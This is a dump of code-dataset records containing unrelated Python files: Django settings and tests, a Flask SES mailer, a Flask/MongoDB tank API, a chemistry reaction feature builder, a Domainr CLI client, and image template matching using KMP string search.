\"Polish\"),\n (\"nl\", \"Dutch\"),\n (\"bn\", \"Bengali\"),\n (\"cs\", \"Czech\"),\n (\"vi\", \"Vietnamese\"),\n (\"th\", \"Thai\"),\n (\"eo\", \"Esperanto\"),\n (\"jbo\", \"Lojban\"),\n)\n\n# add Lojban\nimport django.conf.locale\n\nEXTRA_LANG_INFO = {\n 'jbo': {\n 'bidi': False, # right-to-left\n 'code': 'jbo',\n 'name': 'Lojban',\n 'name_local': 'lojban',\n },\n}\n\nLANG_INFO = django.conf.locale.LANG_INFO.copy()\nLANG_INFO.update(EXTRA_LANG_INFO)\n\ndjango.conf.locale.LANG_INFO = LANG_INFO\n","sub_path":"config/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"69234530","text":"# -*- coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom django.contrib.auth import get_user_model\nfrom shop.models.defaults.address import ShippingAddress\nfrom shop.models.defaults.customer import Customer\n\n\nclass AddressTest(TestCase):\n def setUp(self):\n super(AddressTest, self).setUp()\n User = get_user_model()\n user = {\n 'username': 'john',\n 'first_name': 'John',\n 'last_name': 'Doe',\n 'email': 'john@example.com',\n 'password': 'secret',\n }\n user = User.objects.create(**user)\n self.customer = Customer.objects.create(user=user)\n self.assertGreaterEqual(self.customer.pk, 1)\n\n def test_shipping_address(self):\n address = {'name': \"John Doe\", 'address1': \"31, Orwell Rd\", 'zip_code': \"L41RG\",\n 'city': \"Liverpool\", 'country': 'UK'}\n shipping_addr = ShippingAddress.objects.create(priority=1, customer=self.customer, **address)\n self.assertGreaterEqual(shipping_addr.id, 1)\n addr_block = \"John Doe\\n31, Orwell Rd\\nL41RG Liverpool\\nUK\\n\"\n self.assertMultiLineEqual(shipping_addr.as_text(), addr_block)\n self.assertEqual(ShippingAddress.objects.get_max_priority(self.customer), 1)\n self.assertEqual(ShippingAddress.objects.get_fallback(self.customer), 
shipping_addr)\n","sub_path":"example/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"210799061","text":"\"\"\"Constants for terminal formatting\"\"\"\n\ncolors = 'dark', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'gray'\nFG_COLORS = dict(zip(colors, range(30, 38)))\nBG_COLORS = dict(zip(colors, range(40, 48)))\nSTYLES = dict(zip(('bold', 'dark', 'underline', 'blink', 'invert'), [1,2,4,5,7]))\nFG_NUMBER_TO_COLOR = {v:k for k, v in FG_COLORS.items()}\nBG_NUMBER_TO_COLOR = {v:k for k, v in BG_COLORS.items()}\nNUMBER_TO_STYLE = {v:k for k, v in STYLES.items()}\nRESET_ALL = 0\nRESET_FG = 39\nRESET_BG = 49\n\ndef seq(num):\n return '\u001B[%sm' % num\n\n","sub_path":"fmtstr/termformatconstants.py","file_name":"termformatconstants.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"177316348","text":"from threading import Thread\nfrom flask import current_app, render_template\nfrom flask_mail import Message\nfrom .factory import mail\nimport boto3\n\n\ndef send_async_email(app, ses, sender, recipients, subject, text, html):\n with app.app_context():\n current_app.logger.info(\"In Sending Thread\")\n ses.send_email(\n Source=sender,\n Destination={'ToAddresses': recipients},\n Message={\n 'Subject': {'Data': subject},\n 'Body': {\n 'Text': {'Data': text},\n 'Html': {'Data': html}\n }\n }\n )\n\n\ndef send_email(recipients, sender=None, subject='', template='', **kwargs):\n ses = boto3.client(\n 'ses',\n region_name=current_app.config['SES_REGION_NAME'],\n aws_access_key_id=current_app.config['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=current_app.config['AWS_SECRET_ACCESS_KEY']\n )\n if not sender:\n sender = current_app.config['SES_EMAIL_SOURCE']\n\n html = render_template(template + '.html', **kwargs)\n text = render_template(template + '.txt', **kwargs)\n\n app = current_app._get_current_object()\n thr = Thread(target=send_async_email, args=[app, ses, sender, [recipients], subject,\n text, html])\n thr.start()\n return thr\n\n","sub_path":"web_participant/flask_app/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"285623160","text":"import numpy as np\nfrom itertools import combinations_with_replacement\nfrom DrivingCoordinate import DriveCoordType, DrivingCoordinate\n\nclass Reaction():\n '''\n A class representing a chemical reaction\n '''\n\n def __init__(self, id=None, activationEnergy=None, heatOfRxn=None, reactants=None):\n '''\n Constructor\n '''\n self._possibleAtoms = 'BCHNO'\n self._id = id\n self._activationEnergy = activationEnergy\n self._heatOfRxn = heatOfRxn\n self._drivingCoordinates = []\n self._reactants = reactants # currently only expecting a single pybel molecule\n # TODO: add miscellaneous values (the ones in the dataset not associated with an\n # add or break move)\n\n def addDrivingCoordinate(self, drivingCoordinate):\n self._drivingCoordinates.append(drivingCoordinate)\n\n def sortDrivingCoordinates(self):\n '''\n Sort the atoms within each driving coordinate and then sort the driving coordinates\n by the lower of the 2 charges associated with each\n '''\n addMoves = self.movesOfType(DriveCoordType.ADD)\n breakMoves = self.movesOfType(DriveCoordType.BREAK)\n for addMove in addMoves:\n 
addMove.sortByCharge()\n for breakMove in breakMoves:\n breakMove.sortByCharge()\n addMoves = sorted(addMoves, key=lambda x : x._NBO[0])\n breakMoves = sorted(breakMoves, key=lambda x : x._NBO[0])\n \n return addMoves, breakMoves\n\n def movesOfType(self, type):\n '''\n return all driving coordinates of argument type\n '''\n return list(filter(lambda x : x._Type == type,self._drivingCoordinates))\n \n def buildFeatureVector(self,includeChargeMult=False,includeAddBreak=False,isSorted=True):\n '''\n Builds a feature vector containing data associated with this Reaction\n includeChargeMult: whether to include the product of the 2 charges in each driving\n coordinate as features (5 add + 5 break driving coordinates = 10 features)\n inculdeAddBreak: whether to include the existance of each possible pair of elements\n as a one-hot (binary) feature (num elements choose 2 features). If the pair of\n elements appears in an add or break move, the feature value is 1 (otherwise 0)\n isSorted: whether to sort the driving coordinates before constructing the feature vector\n '''\n # up to 40+10=50 features because of hard limit on add and break moves of 5 and 4 features per move\n if isSorted:\n addMoves, breakMoves = self.sortDrivingCoordinates()\n else:\n addMoves = self.movesOfType(DriveCoordType.ADD)\n breakMoves = self.movesOfType(DriveCoordType.BREAK)\n \n featureVector = np.zeros((40))\n featureVecChargeMult = np.zeros((10))\n for i, addMove in enumerate(addMoves):\n featureVector[2*i:2*(i+1)] = addMove._NBO\n featureVector[10+2*i:10+2*(i+1)] = addMove._Hybrid\n featureVecChargeMult[i] = addMove._NBO[0] * addMove._NBO[1]\n \n for i, breakMove in enumerate(breakMoves):\n #print(breakMove._NBO)\n featureVector[20+2*i:20+2*(i+1)] = breakMove._NBO\n featureVector[30+2*i:30+2*(i+1)] = breakMove._Hybrid\n featureVecChargeMult[5+i] = breakMove._NBO[0] * breakMove._NBO[1]\n #print (\"feature vector\", featureVector)\n #print (\"charge\", featureVecChargeMult)\n if includeChargeMult:\n featureVector = np.concatenate((featureVector, featureVecChargeMult))\n if includeAddBreak:\n featureVector = np.concatenate((featureVector, self.buildAddBrkFeatureVector()))\n return featureVector\n\n def buildAddBrkFeatureVector(self):\n possibleBonds = list(combinations_with_replacement(self._possibleAtoms, 2))\n featureVector = np.zeros((len(possibleBonds)))\n for i, bond in enumerate(possibleBonds):\n for coordinate in self._drivingCoordinates:\n if (coordinate._Atoms[0] == bond[0] and coordinate._Atoms[1] == bond[1]) or\\\n (coordinate._Atoms[0] == bond[1] and coordinate._Atoms[1] == bond[0]):\n featureVector[i] = 1\n return featureVector\n\n def buildOrderedFeatureVector(self):\n '''\n Builds an alterantive feature vector to buildFeatureVector. An ordering of possible\n pairs of elements is chosen and two binary features (one for add and one for break) are\n created for each pair of elements corresponding to whether the reaction contains a move\n of the given type between the pair of elements. 
For each of these features a corresponding\n feature is created to contain the charge product of the elements in the add or break move.\n \n Example: if the 5th feature corresponds to whether there is an add move between carbon\n and hydrogen and there are 15 of this type of feature, the 20th feature correpsonds to the\n charge product of the carbon and hydrogen involved in the add move\n '''\n possibleBonds = list(combinations_with_replacement(sorted(self._possibleAtoms), 2))\n existenceFeatures = np.zeros((len(possibleBonds)*2))\n chargeMultFeatures = np.zeros((len(possibleBonds)*2))\n for coordinate in self._drivingCoordinates:\n index = possibleBonds.index(tuple(sorted(coordinate._Atoms)))\n if coordinate._Type == DriveCoordType.ADD:\n if existenceFeatures[index] == 1:\n chargeMultFeatures[index] = max(chargeMultFeatures[index], coordinate.chargeProduct())\n else:\n chargeMultFeatures[index] = coordinate.chargeProduct()\n existenceFeatures[index] = 1\n elif coordinate._Type == DriveCoordType.BREAK:\n index += len(possibleBonds) # break move indices start where add move indices end\n if existenceFeatures[index] == 1:\n chargeMultFeatures[index] = min(chargeMultFeatures[index], coordinate.chargeProduct())\n else:\n chargeMultFeatures[index] = coordinate.chargeProduct()\n existenceFeatures[index] = 1\n else: raise Exception('Invalid coordinate type!')\n return np.concatenate((existenceFeatures, chargeMultFeatures))\n\n def build_atom_rep_feature_vec(self):\n '''\n Builds feature vector representing this reaction using representations of the atoms\n involved in the GSM driving coordinates\n '''\n featureVec = []\n for type in DriveCoordType:\n coordReps = np.array([coord.build_atom_rep_feature_vec() for coord in self.movesOfType(type)])\n if coordReps.size:\n featureVec += list(np.max(coordReps, axis=0))\n featureVec += list(np.min(coordReps, axis=0))\n featureVec += list(np.mean(coordReps, axis=0))\n featureVec.append(coordReps.shape[0])\n else:\n featureVec += [0] * (DrivingCoordinate.atom_rep_feature_vec_size() * 3 + 1) \n return np.array(featureVec)\n ","sub_path":"Python/Reaction.py","file_name":"Reaction.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"535642081","text":"total = 0\nx = 0\nwhile True:\n Num = input('Enter a number: ')\n # if done is enter, end the loop and complete the calcs\n if Num == 'done':\n break\n else:\n try:\n total += float(Num)\n except:\n print('bad input')\n continue\n # count up the nbr of entries\n x += 1\n# print out the sum, count, and avg\nprint(total, x, float(total) / x)\n","sub_path":"Ex5_10_1.py","file_name":"Ex5_10_1.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"58148227","text":"from flask import Flask, request, jsonify, json\nfrom flask_restful import Api, Resource\nfrom datetime import datetime \nfrom flask_cors import CORS\nfrom flask_pymongo import PyMongo\nfrom marshmallow import Schema, fields, ValidationError\nfrom bson.json_util import dumps\nfrom json import loads\nfrom keys import keys\n\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb+srv://admin:\"+keys[\"password\"]+\"@cluster0.jsdue.mongodb.net/ECSE3038_Lab3?retryWrites=true&w=majority\" \n\nmongo = PyMongo(app)\n\nclass TankSchema(Schema):\n location = fields.String(required=True)\n latitude = fields.Float(required=True)\n longitude = fields.Float(required=True)\n 
percentage_full = fields.Integer(required=True)\n\n\nclass LevelSchema(Schema):\n tank_id = fields.Integer(required = True)\n percentage_full = fields.Integer(required=True)\n\n\nCORS(app) \napi = Api(app)\n\n@app.route(\"/\")\ndef welcome(): \n return \"Welcome!\"\n\nprofile = {\n \"success\": True,\n \"data\": {\n \"last_updated\": \"2/3/2021, 8:48:51 PM\", \n \"username\": \"coolname\",\n \"role\": \"Engineer\",\n \"color\": \"#3478ff\"\n }\n}\n\nsuccess = {\n \"success\": True,\n \"mssg\": \"data saved in database successfully\",\n \"date\": datetime.now().strftime(\"%c\")\n}\n\ntank_info = []\ntank_id = 0\n\nclass Profile(Resource):\n def get(self):\n return profile\n\n def post(self):\n profile[\"data\"][\"last_updated\"] = datetime.now().strftime(\"%c\")\n profile[\"data\"][\"username\"] = request.json['username']\n profile[\"data\"][\"role\"] = request.json['role']\n profile[\"data\"][\"color\"] = request.json['color']\n return profile\n\n def patch(self):\n profile[\"data\"][\"last_updated\"] = datetime.now().strftime(\"%c\")\n\n data = (request.json)\n for key in data:\n profile[\"data\"][key] = request.json[key]\n \n return profile\n\nclass Data(Resource):\n def get(self):\n tanks = mongo.db.tanks.find()\n return jsonify(loads(dumps(tanks)))\n\n\n def post(self):\n try: \n newTank = TankSchema().load(request.json)\n tank_id = mongo.db.tanks.insert_one(newTank).inserted_id\n tank = mongo.db.tanks.find_one(tank_id)\n return loads(dumps(tank))\n except ValidationError as ve:\n return ve.messages, 400\n \n\n\nclass Data2(Resource):\n def patch(self, id):\n mongo.db.tanks.update_one({\"_id\":id}, {\"$set\": request.json})\n tank = mongo.db.tanks.find_one(id)\n return loads(dumps(tank))\n\n\n def delete(self, id):\n check = mongo.db.tanks.delete_one({\"_id\":id})\n\n if check.deleted_count == 1:\n return {\n \"success\": True\n }\n else:\n return {\n \"success\": False\n }, 400\n\nclass Level(Resource):\n def post (self):\n try:\n tank_id = request.json(\"tank_id\")\n water_level = request.json(\"water_level\")\n\n percentage_full = ((200-water_level)/190) * 100\n\n jsonObject = {\n \"tank_id\": tank_id,\n \"percentage_full\": percentage_full\n }\n mongo.db.levels.insert_one(jsonObject)\n return success \n except ValidationError as ve:\n return ve.messages, 400\n \n\napi.add_resource(Profile, \"/profile\")\napi.add_resource(Data, \"/data\")\napi.add_resource(Data2, \"/data/\")\napi.add_resource(Level, \"/tank\")\n\nif __name__ == \"__main__\":\n app.run(\n debug=True,\n # port = 3000,\n # host = \"0.0.0.0\"\n )\n","sub_path":"Lab6_api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"409879077","text":"\"\"\"\nCore functionality for Domainr.\n\"\"\"\n\nfrom argparse import ArgumentParser\nimport configparser\nimport pkg_resources\nimport requests\nimport simplejson as json\nimport sys\nfrom termcolor import colored\n\n\nclass Domain(object):\n \"\"\"Main class for interacting with the domains API.\"\"\"\n\n def environment(self):\n \"\"\"Parse any command line arguments.\"\"\"\n parser = ArgumentParser()\n parser.add_argument('query', type=str, nargs='+',\n help=\"Your domain name query.\")\n parser.add_argument('-i', '--info', action='store_true',\n help=\"Get information for a domain name.\")\n parser.add_argument('--ascii', action='store_true',\n help=\"Use ASCII characters for domain availability.\")\n parser.add_argument('--available', 
action='store_true',\n help=\"Only show domain names that are currently available.\")\n parser.add_argument('--tld', action='store_true',\n help=\"Only check for top-level domains.\")\n args = parser.parse_args()\n return args\n\n def search(self, env):\n \"\"\"Use domainr to get information about domain names.\"\"\"\n \n query = \" \".join(env.query)\n params = {'q': query}\n\n # Try and get the API key from the config file\n config = configparser.ConfigParser()\n configFilename = pkg_resources.resource_filename('domainr', 'domainr.ini')\n config.read(configFilename)\n \n if config['Default']['mashape-key']:\n params['mashape-key'] = config['Default']['mashape-key']\n url = \"https://domainr.p.mashape.com\"\n elif config['Default']['client_id']:\n params['client_id'] = config['Default']['client_id']\n url = \"https://api.domainr.com\"\n else:\n sys.exit(\"Error: No API key provided in config file at:\\n\"\n + \"{0}\\n\".format(configFilename) \n + \"See the README for more info\")\n\n if env.info:\n url += \"/v1/info\"\n else:\n url += \"/v1/search\"\n\n json_data = requests.get(url, params=params)\n # print(json_data.url)\n\n if not json_data.status_code == 200:\n return \"Error: Status {0}; Response: {1}\".format(json_data.status_code, json_data._content)\n data = self.parse(json_data.content, env)\n if not data:\n return \"No results found\\n\"\n else:\n return data\n\n def parse(self, content, env):\n \"\"\"Parse the relevant data from JSON.\"\"\"\n data = json.loads(content)\n if not env.info:\n # Then we're dealing with a domain name search.\n output = []\n results = data['results']\n for domain in results:\n name = domain['domain']\n availability = domain['availability']\n if availability == 'available':\n name = colored(name, 'blue', attrs=['bold'])\n symbol = colored(u\"\\u2713\", 'green')\n if env.ascii:\n symbol = colored('A', 'green')\n else:\n symbol = colored(u\"\\u2717\", 'red')\n if env.ascii:\n symbol = colored('X', 'red')\n # The available flag should skip these.\n if env.available:\n continue\n string = \"%s %s\" % (symbol, name)\n # Now, a few sanity checks before we add it to the output.\n if env.tld:\n if self._tld_check(domain['domain']):\n output.append(string)\n else:\n output.append(string)\n return '\\n'.join(output)\n # Then the user wants information on a domain name.\n return data\n\n def _tld_check(self, name):\n \"\"\"Make sure we're dealing with a top-level domain.\"\"\"\n if name.endswith(\".com\") or name.endswith(\".net\") or name.endswith(\".org\"):\n return True\n return False\n\n def main(self):\n args = self.environment()\n print(self.search(args))\n","sub_path":"domainr/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"41335886","text":"import numpy as np\r\nfrom PIL import Image\r\ndef mtx_similar1(arr1:np.ndarray, arr2:np.ndarray) ->float:\r\n '''\r\n 计算矩阵相似度的一种方法。将矩阵展平成向量,计算向量的乘积除以模长。\r\n 注意有展平操作。\r\n :param arr1:矩阵1\r\n :param arr2:矩阵2\r\n :return:实际是夹角的余弦值,ret = (cos+1)/2\r\n '''\r\n farr1 = arr1.ravel()\r\n farr2 = arr2.ravel()\r\n len1 = len(farr1)\r\n len2 = len(farr2)\r\n if len1 > len2:\r\n farr1 = farr1[:len2]\r\n else:\r\n farr2 = farr2[:len1]\r\n #~如果矩阵的维度、向量的模长不一样。\r\n numer = np.sum(farr1 * farr2)\r\n denom = np.sqrt(np.sum(farr1**2) * np.sum(farr2**2))\r\n similar = numer / denom # 这实际是夹角的余弦值\r\n return (similar+1) / 2 # 姑且把余弦函数当线性\r\n\r\ndef mtx_similar2(arr1:np.ndarray, arr2:np.ndarray) ->float:\r\n 
'''\r\n 计算对矩阵1的相似度。相减之后对元素取平方再求和。因为如果越相似那么为0的会越多。\r\n 如果矩阵大小不一样会在左上角对齐,截取二者最小的相交范围。\r\n :param arr1:矩阵1\r\n :param arr2:矩阵2\r\n :return:相似度(0~1之间)\r\n '''\r\n if arr1.shape != arr2.shape:\r\n minx = min(arr1.shape[0],arr2.shape[0])\r\n miny = min(arr1.shape[1],arr2.shape[1])\r\n differ = arr1[:minx,:miny] - arr2[:minx,:miny]\r\n else:\r\n differ = arr1 - arr2\r\n numera = np.sum(differ**2)\r\n denom = np.sum(arr1**2)\r\n similar = 1 - (numera / denom)\r\n return similar\r\n\r\n\r\ndef mtx_similar3(arr1:np.ndarray, arr2:np.ndarray) ->float:\r\n '''\r\n From CS231n: There are many ways to decide whether\r\n two matrices are similar; one of the simplest is the Frobenius norm. In case\r\n you haven't seen it before, the Frobenius norm of two matrices is the square\r\n root of the squared sum of differences of all elements; in other words, reshape\r\n the matrices into vectors and compute the Euclidean distance between them.\r\n difference = np.linalg.norm(dists - dists_one, ord='fro')\r\n :param arr1:矩阵1\r\n :param arr2:矩阵2\r\n :return:相似度(0~1之间)\r\n '''\r\n if arr1.shape != arr2.shape:\r\n minx = min(arr1.shape[0],arr2.shape[0])\r\n miny = min(arr1.shape[1],arr2.shape[1])\r\n differ = arr1[:minx,:miny] - arr2[:minx,:miny]\r\n #~如果矩阵的大小不一样\r\n else:\r\n differ = arr1 - arr2\r\n dist = np.linalg.norm(differ, ord='fro')\r\n len1 = np.linalg.norm(arr1)\r\n len2 = np.linalg.norm(arr2) # 普通模长\r\n denom = (len1 + len2) / 2\r\n similar = 1 - (dist / denom)\r\n return similar\r\n\r\n\r\nimport random\r\ndef find_position_process(page:str,pic:str):\r\n '''\r\n 问题:在一个大图中查找一个小图/模板图\r\n 这是基础但低效的算法,效率之低而几乎不会用——在我的电脑上一张一千多像素宽度的图查一个400*400图用了超过20min。\r\n :param page:大图\r\n :param pic:小图\r\n :return:打印匹配度较高的位置\r\n '''\r\n pageArr = np.array(Image.open(page).convert('L'))\r\n picArr = np.array(Image.open(pic).convert('L')) # 首先转换成灰度图像\r\n hei,wid = picArr.shape\r\n # if hei > 600:\r\n # #太大了,裁一个400*400以内的小块,用之预比较\r\n # hStart = int(random.uniform(0,hei-400))\r\n # if wid > 400:\r\n # wStart = int(random.uniform(0,wid-400))\r\n # smallArr = picArr[hStart:hStart + 400, wStart:wStart + 400]\r\n # else:\r\n # smallArr = picArr[hStart:hStart + 400,:]\r\n # elif wid > 600:\r\n # wStart = int(random.uniform(0,wid-400))\r\n # smallArr = picArr[:, wStart:wStart+400] # 好吧,实际上保证是比较块一定在600*600以内\r\n # else:\r\n #……发现可能大的子图比较的反而快\r\n smallArr = picArr\r\n sHei, sWid = smallArr.shape\r\n for i in range(0,hei - sHei):\r\n if i%100 == 0:\r\n print('do i:', i)\r\n for k in range(0, wid - sWid):\r\n sim = mtx_similar2(smallArr, pageArr[i: i+sHei, k: k+sWid])\r\n if sim > 0.95:\r\n print(i,k)\r\n\r\n#:: 一段网上找到的openCV代码,也是滑动窗口法,慢。\r\n# # 简单定位图片\r\n# import cv2\r\n# # import numpy as np\r\n#\r\n# def showpiclocation(img, findimg): # 定义定位函数\r\n# # 定位图片\r\n# w = img.shape[1] # 返回img的第二维度长度---宽度\r\n# h = img.shape[0] # 返回img的第一维度长度---高度\r\n# fw = findimg.shape[1]\r\n# fh = findimg.shape[0]\r\n# findpt = None\r\n# for now_h in range(0, h - fh):\r\n# for now_w in range(0, w - fw):\r\n# comp_tz = img[now_h:now_h + fh, now_w:now_w + fw, :] - findimg\r\n# if np.sum(comp_tz) < 1:\r\n# findpt = now_w, now_h\r\n#\r\n# if findpt != None:\r\n# cv2.rectangle(img, findpt, (findpt[0] + fw, findpt[1] + fh), (0, 0, 255)) # opencv函数画矩形\r\n# return img\r\n#\r\n# fn = '00000033.tif'\r\n# fn1 = '000000331.jpg'\r\n# # fn2 = 'pictestt2.png'\r\n# myimg = cv2.imread(fn)\r\n# myimg1 = cv2.imread(fn1)\r\n# # myimg2 = cv2.imread(fn2)\r\n# myimg = showpiclocation(myimg, myimg1)\r\n# # myimg = showpiclocation(myimg, myimg2)\r\n# cv2.namedWindow('img')\r\n# 
cv2.imshow('img', myimg)\r\n# cv2.waitKey()\r\n# cv2.destroyAllWindows()\r\n\r\n\r\n#:KMP字符串匹配算法\r\ndef KMP(bigStr:str, smallStr:str, all = False)->(list, bool, int):\r\n '''\r\n KMP算法,用于查找后字符串在前面字符串的匹配位置。\r\n :param bigStr: 包含的字符串\r\n :param smallStr: 要检测是否含有的字串\r\n :param all: 是否要找到所有的位置。默认为false\r\n :return: 匹配(或最佳匹配)的位置的列表,从0开始,-1为完全没有找到。\r\n bool变量是否是精确匹配。最后第三个返回值是匹配的长度。\r\n '''\r\n def cal_next(string:str)->np.ndarray:\r\n '''\r\n KMP算法所需要的子函数\r\n :param string:\r\n :return:\r\n '''\r\n k = -1\r\n length = len(string)\r\n nextArr = -np.ones(length,dtype=int) #全赋值为-1,不过算法里只要【0】赋值为-1即可\r\n for qq in range(1,length):\r\n while string[k + 1] != string[qq] and k>-1: # 第一个放过\r\n k = nextArr[k] # 向前回溯。qq一定大于k,故安全\r\n if string[k+1] == string[qq]:\r\n k += 1\r\n nextArr[qq] = k\r\n return nextArr\r\n\r\n nextA = cal_next(smallStr)\r\n kk = -1\r\n exact = False\r\n bestPos = list()\r\n bestK = -1 # store the answer\r\n bigLen = len(bigStr)\r\n smaLen = len(smallStr)\r\n for ii in range(0,bigLen):\r\n while bigStr[ii] != smallStr[kk+1] and kk>-1:\r\n kk = nextA[kk]\r\n if bigStr[ii] == smallStr[kk+1]:\r\n kk += 1\r\n if kk > bestK:\r\n bestK = kk\r\n bestPos = [ii-kk,]\r\n elif kk == bestK:\r\n bestPos.append(ii - kk)\r\n else:\r\n pass\r\n if kk == smaLen - 1:\r\n exact = True\r\n if not all: #只要一个就好的话\r\n # return ii - kk, exact\r\n return bestPos, exact, bestK+1\r\n else:\r\n kk = -1 # 找到了一个完全匹配,继续开始\r\n return bestPos, exact, bestK+1\r\n\r\n\r\ndef KMP_int_near(bigStr:str, smallStr:str, all = False, near = 0)->(list,bool, int):\r\n '''\r\n 查找后字符串在前面字符串的匹配位置。\r\n :param bigStr: 包含的字符串\r\n :param smallStr: 要检测是否含有的字串\r\n :param all: 是否要找到所有的位置。默认为false\r\n :return: 匹配(或最佳匹配)的位置的列表,从0开始,-1为完全没有找到。\r\n bool变量是否是精确匹配。最后第三个返回值是匹配长度。\r\n '''\r\n nearEqua = lambda a,b: ab-near\r\n\r\n def cal_next(string:str)->np.ndarray:\r\n k = -1\r\n length = len(string)\r\n nextArr = -np.ones(length,dtype=int) #全赋值为-1,不过算法里只要【0】赋值为-1即可\r\n for qq in range(1,length):\r\n\r\n while not nearEqua(string[k + 1], string[qq]) and k>-1: # 第一个放过\r\n k = nextArr[k] # 向前回溯。qq一定大于k,故安全\r\n if nearEqua(string[k + 1], string[qq]):\r\n k += 1\r\n nextArr[qq] = k\r\n return nextArr\r\n\r\n nextA = cal_next(smallStr)\r\n kk = -1\r\n exact = False\r\n bestPos = list()\r\n bestK = -1 # store the answer\r\n bigLen = len(bigStr)\r\n smaLen = len(smallStr)\r\n for ii in range(0,bigLen):\r\n while not nearEqua(bigStr[ii], smallStr[kk+1]) and kk>-1:\r\n kk = nextA[kk]\r\n if nearEqua(bigStr[ii], smallStr[kk+1]):\r\n kk += 1\r\n if kk > bestK:\r\n bestK = kk\r\n bestPos = [ii-kk,]\r\n elif kk == bestK:\r\n bestPos.append(ii - kk)\r\n else:\r\n pass\r\n if kk == smaLen - 1:\r\n exact = True\r\n if not all: #只要一个就好的话\r\n # return ii - kk, exact\r\n return bestPos, exact, bestK+1\r\n else:\r\n kk = -1 # 找到了一个完全匹配,继续开始\r\n return bestPos, exact, bestK+1\r\n\r\n\r\ndef testKMP():\r\n a = '100100001111010101011111100'\r\n b = '11110'\r\n poiList,ex,le = KMP(a,b,True)\r\n print(poiList, ex, le)\r\n a = 's ixdsrvsnkjandsoicnzxjdskcasdajnc'\r\n b = 'sxzihih'\r\n poiList, ex, le = KMP(a, b)\r\n print(poiList,ex,le)\r\n a = 'bacbababadababacambabacaddababacasdsd'\r\n b = 'ababaca'\r\n poiList,ex,le = KMP(a,b,True)\r\n print(poiList, ex, le)\r\n a = 'bacbababadababacambabacaddababacasdsd'\r\n b = '13323'\r\n poiList,ex,le = KMP(a,b,True)\r\n print(poiList, ex, le)\r\n\r\n\r\n#---------------------------------------------------------------\r\n\r\ndef find_poi_by_deltaString(picB, picS):\r\n '''\r\n 
在一个图片中查找一个子图/模板图的位置。将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 对小图求差分,得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互重叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr11 = np.array(Image.open(picB).convert('L'))\r\n arr22 = np.array(Image.open(picS).convert('L')) # 转换为灰度矩阵。\r\n arr1 = np.round(arr11/128)\r\n arr2 = np.round(arr22/128) # 转成0-1图,小于128的像素点都被当作0。为了更鲁棒。\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n tem1 = np.sum(arr2,axis=0,dtype=np.longlong) #投影(简单求和).axis0为上下方向,形成一行\r\n smaStr = np.zeros(sWid-1, dtype=np.longlong) # 矩阵数据类型要选longlong,防止溢出\r\n for k in range(0, sWid-1):\r\n smaStr[k] = tem1[k] - tem1[k+1] # 求差分,长度变为Swid-1\r\n #~ 这里也可以用roll函数。求差分是为了更加鲁棒。一般像素之间的差分变动的要小。\r\n\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n tem = np.sum(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) #投影(求和)\r\n bigStr = np.zeros(Wid-1,dtype=np.longlong)\r\n for k in range(0, Wid - 1):\r\n bigStr[k] = tem[k] - tem[k + 1] # 求差分,长度变为wid-1\r\n #:use Kmp\r\n temws, fit, teml = KMP(bigStr,smaStr,True) # 为了更鲁棒,可用KPM_int_near\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws) # 注意是嵌套的两个列表\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Ans is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid-1)\r\n #~\r\n\r\n\r\n\r\nfrom scipy.ndimage import filters\r\ndef find_poi_by_GuassianString(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。这是一个实验版本。\r\n result:效果不佳\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 对灰度图进行了高斯模糊,试图增强其鲁棒性。但反而并没有。\r\n 原因可能是出现在边缘。因为对大图进行高斯模糊再切成小块,大图的小块的边缘受到了其周围的像素的干扰。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr11 = np.array(Image.open(picB).convert('L'))/16\r\n arr22 = np.array(Image.open(picS).convert('L'))/16\r\n arr1 = filters.gaussian_filter(arr11,sigma=1)\r\n arr2 = 